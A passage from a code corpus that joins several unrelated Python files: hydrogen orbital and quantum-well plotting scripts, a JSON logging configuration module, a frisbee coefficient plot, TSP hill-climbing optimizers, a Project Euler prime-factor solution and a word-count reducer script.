return np.square((2/(np.sqrt(np.pi)))*np.e**(-r))
x=np.linspace(-5,5,30)
y=np.linspace(-5,5,30)
z=np.linspace(-5,5,30)
elements = []
probability = []
for ix in x:
for iy in y:
for iz in z:
elements.append(str((ix,iy,iz)))
probability.append(prob_1s(ix,iy,iz))
probability = probability/sum(probability)
coord = np.random.choice(elements, size=100000, replace=True, p=probability)
elem_mat = [i.split(',') for i in coord]
elem_mat = np.matrix(elem_mat)
x_coords = [float(i.item()[1:]) for i in elem_mat[:,0]]
y_coords = [float(i.item()) for i in elem_mat[:,1]]
z_coords = [float(i.item()[0:-1]) for i in elem_mat[:,2]]
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x_coords, y_coords, z_coords, alpha=0.05)
ax.set_title("Hydrogen 1s density")
plt.show()
def prob_2s(x,y,z):
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
return np.square((1/(4*np.sqrt(2*np.pi))*(2-(r))*np.e**(-r/2)))
x=np.linspace(-10,10,30)
y=np.linspace(-10,10,30)
z=np.linspace(-10,10,30)
elements = []
probability = []
for ix in x:
for iy in y:
for iz in z:
elements.append(str((ix,iy,iz)))
probability.append(prob_2s(ix,iy,iz))
probability = probability/sum(probability)
coord = np.random.choice(elements, size=100000, replace=True, p=probability)
elem_mat = [i.split(',') for i in coord]
elem_mat = np.matrix(elem_mat)
x_coords = [float(i.item()[1:]) for i in elem_mat[:,0]]
y_coords = [float(i.item()) for i in elem_mat[:,1]]
z_coords = [float(i.item()[0:-1]) for i in elem_mat[:,2]]
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x_coords, y_coords, z_coords, alpha=0.05)
ax.set_title("Hydrogen 2s density")
plt.show()
def prob_2p(x,y,z):
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
return np.square((1/4)*(1/np.sqrt(2*np.pi))*r*(np.e**(-r))*np.cos(theta))
x=np.linspace(-10,10,30)
y=np.linspace(-10,10,30)
z=np.linspace(-10,10,30)
elements = []
probability = []
for ix in x:
for iy in y:
for iz in z:
elements.append(str((ix,iy,iz)))
probability.append(prob_2p(ix,iy,iz))
probability = probability/sum(probability)
coord = np.random.choice(elements, size=100000, replace=True, p=probability)
elem_mat = [i.split(',') for i in coord]
elem_mat = np.matrix(elem_mat)
x_coords = [float(i.item()[1:]) for i in elem_mat[:,0]]
y_coords = [float(i.item()) for i in elem_mat[:,1]]
z_coords = [float(i.item()[0:-1]) for i in elem_mat[:,2]]
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x_coords, y_coords, z_coords, alpha=0.05)
ax.set_title("Hydrogen 2p density")
plt.show()
def prob_3s(x,y,z):
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
return np.square((1/81)*(1/(np.sqrt(3*np.pi)))*(np.e**(-r/3))*(27-(18*r)+(2*r**2)))
x=np.linspace(-15,15,30)
y=np.linspace(-15,15,30)
z=np.linspace(-15,15,30)
elements = []
probability = []
for ix in x:
for iy in y:
for iz in z:
elements.append(str((ix,iy,iz)))
probability.append(prob_3s(ix,iy,iz))
probability = probability/sum(probability)
coord = np.random.choice(elements, size=100000, replace=True, p=probability)
elem_mat = [i.split(',') for i in coord]
elem_mat = np.matrix(elem_mat)
x_coords = [float(i.item()[1:]) for i in elem_mat[:,0]]
y_coords = [float(i.item()) for i in elem_mat[:,1]]
z_coords = [float(i.item()[0:-1]) for i in elem_mat[:,2]]
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x_coords, y_coords, z_coords, alpha=0.05)
ax.set_title("Hydrogen 3s density")
plt.show()
def prob_3p(x,y,z):
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
return np.square((np.sqrt(2)/81)*(1/(np.sqrt(np.pi)))*(np.e**(-r/3))*(6-r))
x=np.linspace(-25,25,30)
y=np.linspace(-25,25,30)
z=np.linspace(-25,25,30)
elements = []
probability = []
for ix in x:
for iy in y:
for iz in z:
elements.append(str((ix,iy,iz)))
probability.append(prob_3p(ix,iy,iz))
probability = probability/sum(probability)
coord = np.random.choice(elements, size=100000, replace=True, p=probability)
elem_mat = [i.split(',') for i in coord]
elem_mat = np.matrix(elem_mat)
x_coords = [float(i.item()[1:]) for i in elem_mat[:,0]]
y_coords = [float(i.item()) for i in elem_mat[:,1]]
z_coords = [float(i.item()[0:-1]) for i in elem_mat[:,2]]
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x_coords, y_coords, z_coords, alpha=0.05)
ax.set_title("Hydrogen 3p density")
plt.show()
def prob_3d(x,y,z):
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
return np.square(((r**2)/81)*(1/np.sqrt(6*np.pi))*(np.e**(-r/3))*((3*np.cos(theta)**2)-1))
x=np.linspace(-25,25,30)
y=np.linspace(-25,25,30)
z=np.linspace(-25,25,30)
elements = []
probability = []
for ix in x:
for iy in y:
for iz in z:
elements.append(str((ix,iy,iz)))
probability.append(prob_3d(ix,iy,iz))
probability = probability/sum(probability)
coord = np.random.choice(elements, size=100000, replace=True, p=probability)
elem_mat = [i.split(',') for i in coord]
elem_mat = np.matrix(elem_mat)
x_coords = [float(i.item()[1:]) for i in elem_mat[:,0]]
y_coords = [float(i.item()) for i in elem_mat[:,1]]
z_coords = [float(i.item()[0:-1]) for i in elem_mat[:,2]]
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x_coords, y_coords, z_coords, alpha=0.05)
ax.set_title("Hydrogen 3d density")
plt.show()
n=1
Es=[]
radii=[]
Vs=[]
Ps=[]
while n<=10:
e=E(n)
rs=r(n)
vs=v(n)
ps=p(n)
radii.append([rs,rs])
Es.append([e,e])
Vs.append([vs,vs])
Ps.append([ps,ps])
n=n+1
x=[1,2]
plt.figure(figsize=(1.5,6))
plt.plot(x,Es[0],'k')
plt.plot(x,Es[1],'k')
plt.plot(x,Es[2],'k')
plt.plot(x,Es[3],'k')
plt.plot(x,Es[4],'k')
plt.plot(x,Es[5],'k')
plt.plot(x,Es[6],'k')
plt.plot(x,Es[7],'k')
plt.plot(x,Es[8],'k')
plt.plot(x,Es[9],'k')
plt.xlim(1.1,1.9)
plt.yticks([-13.6, -3.4, -1.5, -.85, -.2],('n=1, -13.6eV','n=2, -3.4eV','n=3, -1.5eV','n=4, -0.85eV','n=5+'))
plt.xticks([])
plt.title('Energy Levels of a Hydrogen Atom electron')
plt.show()
plt.figure(figsize=(1.5,6))
plt.plot(x,radii[0],'k')
plt.plot(x,radii[1],'k')
plt.plot(x,radii[2],'k')
plt.plot(x,radii[3],'k')
plt.plot(x,radii[4],'k')
plt.plot(x,radii[5],'k')
plt.plot(x,radii[6],'k')
plt.plot(x,radii[7],'k')
plt.plot(x,radii[8],'k')
plt.plot(x,radii[9],'k')
plt.xlim(1.1,1.9)
plt.yticks([1,4,9,16,25,36,49,64,81,100])
plt.xticks([])
plt.title('Quantized Radii of electron [Bohr radii]')
plt.show()
plt.figure(figsize=(1.5,6))
plt.plot(x,Vs[0],'k')
plt.plot(x,Vs[1],'k')
plt.plot(x,Vs[2],'k')
plt.plot(x,Vs[3],'k')
plt.plot(x,Vs[4],'k')
plt.plot(x,Vs[5],'k')
plt.plot(x,Vs[6],'k')
plt.plot(x,Vs[7],'k')
plt.plot(x,Vs[8],'k')
plt.plot(x,Vs[9],'k')
plt.xlim(1.1,1.9)
plt.yticks([2.2e6,1.1e6,7.3e5,5.5e5,4.4e5,3.6e5],('2.2e6','1.1e6','7.3e5','5.5e5','4.4e5','n=6+'))
plt.xticks([])
plt.title('Quantized Velocity of electron [m/s]')
plt.show()
plt.figure(figsize=(1.5,6))
plt.plot(x,Ps[0],'k')
plt.plot(x,Ps[1],'k')
plt.plot(x,Ps[2],'k')
plt.plot(x,Ps[3],'k')
plt.plot(x,Ps[4],'k')
plt.plot(x,Ps[5],'k')
plt.plot(x,Ps[6],'k')
plt.plot(x,Ps[7],'k')
plt.plot(x,Ps[8],'k')
plt.plot(x,Ps[9],'k')
plt.xlim(1.1,1.9)
plt.yticks([2,1,.66,.5,.4,.33],('2','1','.66','.5','.4','n=6+'))
plt.xticks([])
plt.title('Quantized momenta of electron [e-24 kg.m/s]')
plt.show()
zs=2
ZEs=[]
while zs<=5:
zes=Ze(zs,1)
ZEs.append([zes,zes])
zs=zs+1
plt.figure(figsize=(1.5,6))
plt.plot(x,ZEs[0])
plt.plot(x,ZEs[1])
plt.plot(x,ZEs[2])
plt.plot(x,ZEs[3])
plt.xlim(1.1,1.9)
plt.yticks([-54.43,-122.46,-217.71,-340.17],('He(-54.43eV)','Li(-122.46eV)','Be(-217.71eV)','B(-340.17eV)'))
plt.xticks([])
plt.title('Ionizing Energy of ground state electron for Z=2-5')
plt.show()
m,n=10,2
BalmerphotonE=[]
Balmerphotonwavelength=[]
while m>n:
BPE=delE(m,n)
BPW=photonwavel(BPE)
BPWref=BPW/1e-9
BalmerphotonE.append(BPE)
Balmerphotonwavelength.append([BPWref,BPWref])
m=m-1
plt.figure(figsize=(15,1.5))
ax=plt.axes()
ax.set_facecolor('black')
plt.plot(Balmerphotonwavelength[0],x, color='indigo')
plt.plot(Balmerphotonwavelength[1],x, color='indigo')
plt.plot(Balmerphotonwavelength[2],x, color='indigo')
plt.plot(Balmerphotonwavelength[3],x, color='indigo')
plt.plot(Balmerphotonwavelength[4],x, color='purple')
plt.plot(Balmerphotonwavelength[5],x, color='blue')
plt.plot(Balmerphotonwavelength[6],x, color='green')
plt.plot(Balmerphotonwavelength[7],x, color='red')
plt.ylim(1.1,1.9)
plt.xticks([396,410,434,486,656],('<---UV','410nm','434nm','486nm','656nm'))
plt.title('Balmer series Hydrogen Emission Spectrum')
plt.yticks([])
plt.show()
from mpl_toolkits.mplot3d import Axes3D
n=1
L=1
k=n*np.pi/L
x=0
psi=np.sqrt(2/L)*np.sin(k*x)
dpsi=np.sqrt(2)*k*np.cos(k*x)/np.sqrt(L)
X=[x]
PSI=[0]
P=[psi**2]
dx=1e-5
while x<=L:
d2psi=-k**2*(np.sqrt(2/L))*np.sin(k*x)
dpsi=dpsi+d2psi*dx
psi=psi+dpsi*dx
x=x+dx
X.append(x)
PSI.append(psi)
P.append((np.sqrt(2/L)*np.sin(k*x))**2)
n=2
L=1
k=n*np.pi/L
x=0
psi=np.sqrt(2/L)*np.sin(k*x)
dpsi=np.sqrt(2)*k*np.cos(k*x)/np.sqrt(L)
PSI2=[0]
P2=[psi**2]
dx=1e-5
while x<=L:
d2psi=-k**2*(np.sqrt(2/L))*np.sin(k*x)
dpsi=dpsi+d2psi*dx
psi=psi+dpsi*dx
x=x+dx
PSI2.append(psi+5)
P2.append(((np.sqrt(2/L)*np.sin(k*x))**2)+5)
n=3
L=1
k=n*np.pi/L
x=0
psi=np.sqrt(2/L)*np.sin(k*x)
dpsi=np.sqrt(2)*k*np.cos(k*x)/np.sqrt(L)
PSI3=[0]
P3=[psi**2]
dx=1e-5
while x<=L:
d2psi=-k**2*(np.sqrt(2/L))*np.sin(k*x)
dpsi=dpsi+d2psi*dx
psi=psi+dpsi*dx
x=x+dx
PSI3.append(psi+10)
P3.append(((np.sqrt(2/L)*np.sin(k*x))**2)+10)
n=4
L=1
k=n*np.pi/L
x=0
psi=np.sqrt(2/L)*np.sin(k*x)
dpsi=np.sqrt(2)*k*np.cos(k*x)/np.sqrt(L)
PSI4=[0]
P4=[psi**2]
dx=1e-5
while x<=L:
d2psi=-k**2*(np.sqrt(2/L))*np.sin(k*x)
dpsi=dpsi+d2psi*dx
psi=psi+dpsi*dx
x=x+dx
PSI4.append(psi+15)
P4.append(((np.sqrt(2/L)*np.sin(k*x))**2)+15)
xgrid=[0,1]
ygrid=[[0,0],[5,5],[10,10],[15,15]]
plt.figure(figsize=(3,6))
plt.title('Wave function for Psi(x,n)')
plt.plot(X,PSI,color='blue')
plt.plot(xgrid,ygrid[0],color='black')
plt.plot(xgrid,ygrid[1],color='black')
plt.plot(xgrid,ygrid[2],color='black')
plt.plot(xgrid,ygrid[3],color='black')
plt.plot(X,PSI2,color='blue')
plt.plot(X,PSI3,color='blue')
plt.plot(X,PSI4,color='blue')
plt.xlim(0,1)
plt.yticks([0,5,10,15],('n=1','n=2','n=3','n=4'))
plt.xticks([0,1],('0','L'))
plt.show()
plt.figure(figsize=(3,6))
plt.title('Probability curve for Psi(x,n)')
plt.plot(X,P,color='blue')
plt.plot(X,P2,color='blue')
plt.plot(X,P3,color='blue')
plt.plot(X,P4,color='blue')
plt.plot(xgrid,ygrid[0],color='black')
plt.plot(xgrid,ygrid[1],color='black')
plt.plot(xgrid,ygrid[2],color='black')
plt.plot(xgrid,ygrid[3],color='black')
plt.xlim(0.1,1)
plt.yticks([0,5,10,15],('n=1','n=2','n=3','n=4'))
plt.xticks([0,1],('0','L'))
plt.show()
n=1
k=n*np.pi/L
def f(x, y):
return np.sqrt(2/L)*np.sin(k*x)*np.sqrt(2/L)*np.sin(k*y)
x = np.linspace(-L, L, 30)
y = np.linspace(-L, L, 30)
X, Y = np.meshgrid(x, y)
Z = f(X, Y)
fig = plt.figure()
ax = plt.axes(projection='3d')
ax.contour3D(X, Y, Z, 50, cmap='viridis')
ax.set_xlabel('x')
plt.xticks([])
plt.yticks([])
ax.set_zticks([])
ax.set_ylabel('y')
ax.set_zlabel('z')
import scipy.integrate as inte
import scipy.optimize as opt
def findzeros(rightvals):
return np.where(np.diff(np.signbit(rightvals)))[0]
def shoot_ode(E,psi_init,x,L):
sol=inte.odeint(schrderiv,psi_init,x,args=(L,E))
return sol[len(sol)-1][0]
def schrderiv(y,r,L,E):
du2=y[0]*((L*(L+1))/(r**2)-2/r-E)
return [y[1],du2]
def normalize(output):
normal = max(output)
return output*(1/normal)
def shoothydr(psi_init,h_,L):
x_arr_hy=np.arange(0.0001,35.0+h_,h_)
E_arr = np.arange(-1,0,.001)
rightb=[]
for EE in E_arr:
psi=inte.odeint(schrderiv,psi_init,x_arr_hy,args=(L,EE))[:,0]
rightb.append(psi[len(psi)-1])
rightb_arr=np.asarray(rightb)
crossings=findzeros(rightb_arr)
energy_1=[]
for cross in crossings:
energy_1.append(opt.newton(shoot_ode,E_arr[cross],args=(psi_init,x_arr_hy,L)))
psi_out=[]
for EN in energy_1:
psi_out.append(inte.odeint(schrderiv,psi_init,x_arr_hy,args=(L,EN))[:,0])
return x_arr_hy,np.asarray(psi_out)
def HYDRO(x,N,L):
if (((N-L-1)==0) and (L==0)):
return x*np.exp(-x)
elif (((N-L-1)==1) and (L==0)):
return (np.sqrt(2)*(-x+2)*np.exp(-x/2)/4)*x
elif ((N-L-1)==2):
return (2*np.sqrt(3)*(2*x**2/9-2*x+3)*np.exp(-x/3)/27)*x
elif (((N-L-1)==0) and (L==1)):
return (np.sqrt(6)*x*np.exp(-x/2)/12)*x
else:
print("No wavefunction found")
def plot_wave(fig,title_string,x_arr,num_arr,ana_arr,axis_list):
plt.cla()
plt.clf()
plt.plot(x_arr,num_arr,'b.',linewidth=4,label=r"$\Psi(\hat{x})_{num}$")
plt.plot(x_arr,normalize(ana_arr),'r-',label=r"$\Psi(\hat{x})_{ana}$")
plt.ylabel(r"$\Psi(\hat{x})$",fontsize=16)
plt.xlabel(r"$\hat{x}$",fontsize='small')
plt.axis(axis_list)
plt.title(title_string)
plt.grid()
psi_0=0.0
phi_0=1.0
psi_init=np.asarray([psi_0,phi_0])
h_=1.0/200.0
fig=plt.figure()
hydro_x,hydro_num=shoothydr(psi_init,h_,0)
hydro_x2p,hydro_num2p=shoothydr(psi_init,h_,1)
hydro_ana1s=HYDRO(hydro_x,1,0)
hydro_ana2s=HYDRO(hydro_x,2,0)
hydro_ana3s=HYDRO(hydro_x,3,0)
hydro_ana2p=HYDRO(hydro_x,2,1)
print("Hydrogen shooting")
plot_wave(fig,"Hydrogen Atom, 1s",hydro_x,normalize(hydro_num[0,:]),hydro_ana1s,[-0.1,30,-0.1,1.2])
fig1=plt.figure()
plot_wave(fig1,"Hydrogen Atom, 2s",hydro_x,normalize(hydro_num[1,:]),hydro_ana2s,[-0.1,30,-2.2,1.2])
fig2=plt.figure()
plot_wave(fig2,"Hydrogen Atom, 2p",hydro_x2p,normalize(hydro_num2p[0,:]),hydro_ana2p,[-0.1,30,-0.1,1.2])
fig3=plt.figure()
plot_wave(fig3,"Hydrogen Atom, 3s",hydro_x,normalize(hydro_num[2,:]),hydro_ana3s,[-0.1,30,-1.2,1.2])
from mayavi import mlab
x, y, z = np.ogrid[-25:25:200j, -25:25:200j, -25:25:200j]
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
s=np.square(((r**2)/81)*(1/np.sqrt(6*np.pi))*(np.e**(-r/3))*((3*np.cos(theta)**2)-1))
mlab.pipeline.volume(mlab.pipeline.scalar_field(s))
mlab.title("3d Hydrogen")
mlab.show()
x, y, z = np.ogrid[-25:25:200j, -25:25:200j, -25:25:200j]
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
s=np.square((np.sqrt(2)/81)*(1/(np.sqrt(np.pi)))*(np.e**(-r/3))*(6-r))
mlab.pipeline.volume(mlab.pipeline.scalar_field(s))
mlab.title("3p Hydrogen")
mlab.show()
x, y, z = np.ogrid[-15:15:200j, -15:15:200j, -15:15:200j]
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
s=np.square((1/81)*(1/(np.sqrt(3*np.pi)))*(np.e**(-r/3))*(27-(18*r)+(2*r**2)))
mlab.pipeline.volume(mlab.pipeline.scalar_field(s))
mlab.title("3s Hydrogen")
mlab.show()
x, y, z = np.ogrid[-10:10:200j, -10:10:200j, -10:10:200j]
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
s=np.square((1/4)*(1/np.sqrt(2*np.pi))*r*(np.e**(-r))*np.cos(theta))
mlab.pipeline.volume(mlab.pipeline.scalar_field(s))
mlab.title("2p Hydrogen")
mlab.show()
x, y, z = np.ogrid[-10:10:200j, -10:10:200j, -10:10:200j]
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
s=np.square((1/(4*np.sqrt(2*np.pi))*(2-(r))*np.e**(-r/2)))
mlab.pipeline.volume(mlab.pipeline.scalar_field(s))
mlab.title("2s Hydrogen")
mlab.show()
x, y, z = np.ogrid[-5:5:200j, -5:5:200j, -5:5:200j]
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
s=np.square((2/(np.sqrt(np.pi)))*np.e**(-r))
mlab.pipeline.volume(mlab.pipeline.scalar_field(s))
mlab.title("1s Hydrogen")
mlab.show()
| 2.015625
| 2
|
src/seedwork/infrastructure/logging.py
|
Ermlab/python-ddd
| 308
|
12777968
|
from pythonjsonlogger import jsonlogger
from datetime import datetime
import logging
from logging import Logger
from logging.config import dictConfig
from seedwork.utils.functional import SimpleLazyObject
from seedwork.infrastructure.request_context import request_context
class RequestContextFilter(logging.Filter):
""" "Provides correlation id parameter for the logger"""
def __init__(self, name: str, request_context) -> None:
super().__init__(name=name)
self.request_context = request_context
def filter(self, record):
record.correlation_id = self.request_context.correlation_id.get()
return True
class ElkJsonFormatter(jsonlogger.JsonFormatter):
"""
    ELK-stack-compatible formatter
"""
def add_fields(self, log_record, record, message_dict):
super(ElkJsonFormatter, self).add_fields(log_record, record, message_dict)
log_record["@timestamp"] = datetime.now().isoformat()
log_record["level"] = record.levelname
log_record["logger"] = record.name
class LoggerFactory:
_configured = False
@classmethod
def configure(
cls,
logger_name="app",
log_filename="./logs.json",
request_context=request_context,
):
cls.logger_name = logger_name
cls.log_filename = log_filename
cls.request_context = request_context
cls._configured = True
@classmethod
def create_logger(cls):
"""
Returns a logger instance, based on a configuration options
"""
if not cls._configured:
cls.configure()
logging_config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"default": {
# exact format is not important, this is the minimum information
"format": "%(asctime)s %(name)-12s %(levelname)-8s %(correlation_id)s %(message)s",
},
"colored": {
"()": "colorlog.ColoredFormatter",
"format": "%(log_color)s%(asctime)s %(name)-12s %(levelname)-8s %(correlation_id)s %(message)s",
"log_colors": {
"DEBUG": "white",
"INFO": "green",
"WARNING": "yellow",
"ERROR": "red",
"CRITICAL": "red,bold",
},
},
"colored_db": {
"()": "colorlog.ColoredFormatter",
"format": "%(log_color)s%(asctime)s %(name)-12s %(levelname)-8s %(correlation_id)s %(message)s",
"log_colors": {
"DEBUG": "purple",
"INFO": "green",
"WARNING": "yellow",
"ERROR": "red",
"CRITICAL": "red,bold",
},
},
"json_formatter": {
"()": "seedwork.infrastructure.logging.ElkJsonFormatter",
},
},
"handlers": {
# console logs to stderr
"console": {
"class": "logging.StreamHandler",
"formatter": "default",
},
"colored_console": {
"class": "colorlog.StreamHandler",
"formatter": "colored",
},
"colored_console_db": {
"class": "colorlog.StreamHandler",
"formatter": "colored_db",
},
"file_handler": {
"class": "logging.handlers.RotatingFileHandler",
"filename": cls.log_filename,
"formatter": "json_formatter",
}
if cls.log_filename
else None,
# Add Handler for Sentry for `warning` and above
# 'sentry': {
# 'level': 'WARNING',
# 'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',
# },
},
"loggers": {
cls.logger_name: {
"level": "DEBUG",
"handlers": ["colored_console", "file_handler"], # , 'sentry'],
},
# Prevent noisy modules from logging to Sentry
"noisy_module": {
"level": "ERROR",
"handlers": ["console"],
"propagate": False,
},
},
}
dictConfig(logging_config)
logger = logging.getLogger(name=cls.logger_name)
logger.addFilter(
RequestContextFilter(
name=cls.logger_name, request_context=cls.request_context
)
)
return logger
"""
We are making logger globally available, but to make it configurable logger lazy-evaluated.
Use `LoggerFactory.configure()` to configure the logger prior to its usage
"""
logger = SimpleLazyObject(LoggerFactory.create_logger)
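# Usage sketch (illustrative, not part of the original module):
#
#   from seedwork.infrastructure.logging import LoggerFactory, logger
#
#   LoggerFactory.configure(logger_name="app", log_filename="./logs.json")
#   logger.info("application started")   # first access builds the configured logger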
| 2.25
| 2
|
research/coefficients.py
|
carrino/FrisPy
| 0
|
12777969
|
<reponame>carrino/FrisPy<gh_stars>0
import math
from pprint import pprint
import matplotlib.pyplot as plt
from frispy import Discs
model = Discs.ultrastar
# plot coefficients from -90 to 90 degrees
deg = range(-90, 90)
#lift = [model.C_lift(x * math.pi / 180) for x in deg]
#plt.plot(deg, lift)
#drag = [model.C_y(x * math.pi / 180) for x in deg]
#plt.plot(deg, drag)
pitch = [model.C_y(x * math.pi / 180) for x in deg]
plt.plot(deg, pitch)
plt.show()
| 2.578125
| 3
|
Traveling Salesman/parametric.py
|
lbenning/Evolutionary
| 0
|
12777970
|
import math
import random
import numpy
from tools import *
'''
Parametric Optimizers to search for optimal TSP solution.
Method 1: Stochastic Hill Climbing search
Method 2: Random Search - Used as benchmark
'''
# Initialize the population, a collection of paths
def createPath(m):
n = numpy.arange(1,m+1)
numpy.random.shuffle(n)
return n
# Perform a stochastic hill climbing search
def stochClimb(points,bound,inter):
p = len(points)
# ctr for fitness func. eval.
ctr = 0
# data taken at each i in inter
data = []
# best seen so far
maxfit = 0.0
while (ctr < bound):
# Path
v = createPath(p)
f = fitnessShort(v,points)
if (f > maxfit):
maxfit = f
ctr += 1
if (ctr in inter):
data.append(1.0/maxfit)
if (ctr >= bound):
return data
# Create swap indices
o = numpy.arange(v.size)
i = numpy.arange(v.size)
while (ctr < bound):
climbed = False
numpy.random.shuffle(o)
numpy.random.shuffle(i)
for x in range(o.size):
for y in range(i.size):
swap(v,o[x],i[y])
shot = fitnessShort(v,points)
ctr += 1
if (shot <= f):
swap(v,o[x],i[y])
else:
f = shot
climbed = True
if (ctr in inter):
if (shot > maxfit):
maxfit = shot
data.append(1.0/maxfit)
if (ctr >= bound):
return data
# If no improvement made, local optimum reached
# Return solution, otherwise keep trying to climb
if (not climbed):
break
else:
if (f > maxfit):
                    maxfit = f
    # Fallback: the evaluation budget can run out between checkpoints
    return data
# Perform a random search, used primarily for benchmarking
def randSearch(points,bound,inter):
p = len(points)
scores = []
best = 0.0
for x in range(1,bound+1):
z = createPath(p)
s = fitnessShort(z,points)
if (s > best):
best = s
if (x in inter):
scores.append(1.0/best)
return scores
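# Illustrative self-test (not part of the original module). It assumes that tools.py,
# imported above, provides fitnessShort(path, points) and swap(path, i, j), and that a
# "point" is simply a 2-D coordinate pair; the point set and checkpoints are placeholders.
if __name__ == "__main__":
    demo_points = [(random.random(), random.random()) for _ in range(20)]
    checkpoints = set(range(100, 1001, 100))
    print("random search best lengths:", randSearch(demo_points, 1000, checkpoints))
    print("hill climbing best lengths:", stochClimb(demo_points, 1000, checkpoints))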
| 3.28125
| 3
|
exercicios_pyhton/leia_int_leia_fload/validar_dados.py
|
wcalazans81/cursoemvideo_de_python
| 0
|
12777971
|
<gh_stars>0
sexo = str(input('Digite seu sexo: [M/F] ')).strip().upper()[0]
while sexo not in 'MmFf':
    sexo = str(input('Por favor digite um sexo válido! [M/F] ')).strip().upper()[0]
print(f'Sexo {sexo} registrado com sucesso.')
| 3.484375
| 3
|
2019-10-10-at1-op2.py
|
mpassosbr/python3
| 0
|
12777972
|
<reponame>mpassosbr/python3
print("Calculadora completa")
num1 = input("Digite o primeiro número: ")
operador = input("Digite um operador matemático (+, -, *, /): ")
num2 = input("Digite o segundo número: ")
msg_op = False
try:
num1 = float(num1)
num2 = float(num2)
if operador == "+":
resultado = num1 + num2
elif operador == "-":
resultado = num1 - num2
elif operador == "*":
resultado = num1 * num2
elif operador == "/":
resultado = num1 / num2
else:
msg_op = True
print("Resultado: " + str(resultado))
if resultado == int(resultado):
print("O resultado é um número inteiro.")
else:
print("O resultado é um número decimal.")
except:
if msg_op:
print("O operador matemático digitado é inválido.")
else:
print("Digite apenas números, por favor.")
| 4.3125
| 4
|
mysfire/processors/_array_utils.py
|
DavidMChan/mysfire
| 3
|
12777973
|
from typing import Dict, List, Optional, Union
import torch
from ..torch_utils import padded_stack
def stack_arrays_as_dict(
batch: List[Optional[torch.Tensor]], pad: bool = True
) -> Optional[
Union[
torch.Tensor,
Dict[str, Union[Optional[torch.Tensor], Optional[List[Optional[torch.Tensor]]]]],
List[Optional[torch.Tensor]],
]
]:
"""Stack a list of optional tensors into either a single tensor or a set of ragged tensors.
NOTE: Should be used within the collate function, otherwise "__root__" doesn't really make sense.
Args:
batch (List[Optional[torch.Tensor]]): The batch of tensors to stack.
        pad (bool, optional): Whether to pad ragged tensors and return their sequence lengths alongside the stacked data. Defaults to True.
Returns:
Optional[ Union[
torch.Tensor,
Dict[str, Union[Optional[torch.Tensor],Optional[List[Optional[torch.Tensor]]]]],
List[Optional[torch.Tensor]], ] ]: The stacked/ragged tensors
"""
# If the input shape is the same for every element in the batch, stack the arrays, else pad the arrays to the
# same shape.
proto_s = [b for b in batch if b is not None]
if not proto_s:
return [None] * len(batch)
proto = proto_s[0]
if all([x is None or x.shape == proto.shape for x in batch]):
if pad:
return {
"__root__": torch.stack([x if x is not None else torch.zeros_like(proto_s[0]) for x in batch], dim=0),
"seqlen": torch.tensor([x.shape[0] if x is not None else 0 for x in batch]),
}
return torch.stack([x if x is not None else torch.zeros_like(proto_s[0]) for x in batch], dim=0)
if all([x is None or x.shape[1:] == proto.shape[1:] for x in batch]):
if pad:
# Pad the first axis, and return sequence lengths
tensors = [x if x is not None else torch.zeros(*proto.shape[1:]).to(proto.dtype) for x in batch]
d, s = padded_stack(tensors)
return {"__root__": d, "seqlen": s}
# TODO: Correct the return types on this data
if pad:
return {"__root__": batch, "seqlen": torch.tensor([x.shape[0] if x is not None else 0 for x in batch])}
return batch
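# Usage sketch (illustrative, not part of the original module; the shapes below assume
# that padded_stack pads along the first dimension and returns (data, lengths)):
#
#   batch = [torch.randn(3, 4), torch.randn(5, 4)]
#   out = stack_arrays_as_dict(batch, pad=True)
#   # out["__root__"] is expected to have shape (2, 5, 4) and out["seqlen"] to equal tensor([3, 5])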
| 2.640625
| 3
|
0003/solution.py
|
rnsavinelli/project-euler
| 1
|
12777974
|
#!/usr/bin/python3
import math
def is_prime2(n: int) -> bool:
    if n < 2:
        return False
    for i in range(2, math.isqrt(n) + 1):
        if not (n % i):
            return False
    return True
def prime_factors(n: int) -> list:
    primes = []
    for i in range(1, math.isqrt(n) + 1):
        if n % i == 0:
            # check both the divisor and its cofactor so prime factors above sqrt(n) are not missed
            if is_prime2(i):
                primes.append(i)
            if is_prime2(n // i):
                primes.append(n // i)
    return sorted(primes, reverse=True)
def solve(n: int) -> int:
    return prime_factors(n)[0]
if __name__ == '__main__':
print(solve(600851475143))
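# Example (from the problem statement, illustrative): solve(13195) is expected to return 29,
# the largest prime factor of 13195 = 5 * 7 * 13 * 29.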
| 3.75
| 4
|
MP3-testfiles/word_count_juice.py
|
dayuebai/PassionFruit
| 0
|
12777975
|
#!/usr/local/bin/python3
# This script counts the number of 1's in the file, and output the <key,count> pair
# argv[1] a key i.e. a word
# argv[2] a file containing a list of 1's
#
# Author: <NAME>, <NAME>
# Date: 11/23/2020
import sys
key = sys.argv[1]
filename = sys.argv[2]
count = 0
with open(filename, "r") as file:
for line in file:
if len(line.strip()) > 0:
count += 1
print(key + "," + str(count))
| 3.6875
| 4
